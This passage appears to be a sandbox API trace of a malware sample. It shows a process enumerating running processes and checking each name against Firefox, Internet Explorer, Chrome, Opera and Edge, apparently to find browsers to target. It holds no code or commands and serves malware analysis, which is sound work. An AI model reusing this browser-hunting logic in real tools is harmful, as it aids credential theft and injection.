(lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0242.319] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0242.319] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.319] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.320] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0242.320] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0242.320] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0242.320] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0242.320] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.320] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.320] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0242.320] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0242.320] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0242.320] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0242.320] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.320] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.321] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0242.321] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0242.321] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0242.321] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0242.321] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.321] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.321] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0242.321] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0242.321] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0242.321] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0242.322] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.322] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.322] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0242.322] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0242.322] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0242.322] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0242.322] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.322] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0242.323] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0242.323] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0242.323] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0242.323] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0242.323] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.323] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.323] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0242.323] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0242.323] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0242.323] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0242.323] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.323] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.324] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0242.324] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0242.324] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0242.324] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0242.324] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.324] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0242.324] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0242.324] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0242.324] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0242.325] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0242.325] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.325] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0242.325] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0242.325] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0242.325] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0242.325] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0242.325] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.325] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0242.326] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0242.326] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0242.326] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0242.326] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0242.326] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.326] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.326] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0242.326] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0242.326] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0242.326] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0242.326] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.326] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0242.327] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0242.327] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0242.327] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0242.327] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0242.327] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.327] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0242.327] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0242.327] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0242.327] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0242.327] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0242.327] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.327] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0242.328] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0242.328] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0242.328] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0242.328] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0242.328] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.328] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0242.329] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0242.329] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0242.329] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0242.329] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0242.329] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.329] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0242.329] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0242.329] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0242.329] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0242.329] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0242.329] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.329] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0242.330] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0242.330] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0242.330] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0242.330] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0242.330] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.330] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0242.330] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0242.330] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0242.330] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0242.330] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0242.330] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.330] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0242.331] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0242.331] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0242.331] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0242.331] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0242.331] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.331] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0242.331] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0242.332] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0242.332] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0242.332] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0242.332] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.332] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0242.332] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0242.332] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0242.332] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0242.332] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0242.332] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.332] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0242.333] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0242.333] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0242.333] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0242.333] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0242.333] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.333] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0242.333] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0242.333] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0242.333] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0242.333] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0242.333] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.333] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0242.334] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0242.334] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0242.334] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0242.334] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0242.334] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.334] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0242.334] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0242.334] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0242.334] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0242.334] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0242.335] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.335] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0242.335] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0242.335] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0242.335] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0242.335] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0242.335] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.335] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0242.336] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0242.336] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0242.336] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0242.336] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0242.336] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.336] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0242.336] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0242.336] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0242.336] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0242.336] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0242.336] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.336] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0242.337] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0242.337] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0242.337] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0242.337] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0242.337] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.337] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0242.337] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0242.337] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0242.337] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0242.337] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0242.337] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.337] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0242.338] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0242.338] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0242.338] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0242.338] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0242.338] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.338] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0242.338] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0242.339] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0242.339] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0242.339] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0242.339] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.339] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0242.339] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0242.339] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0242.339] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0242.339] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0242.339] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.339] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0242.340] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0242.340] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0242.340] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0242.340] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0242.340] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.340] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.340] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0242.340] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0242.340] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0242.340] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0242.340] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.340] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: 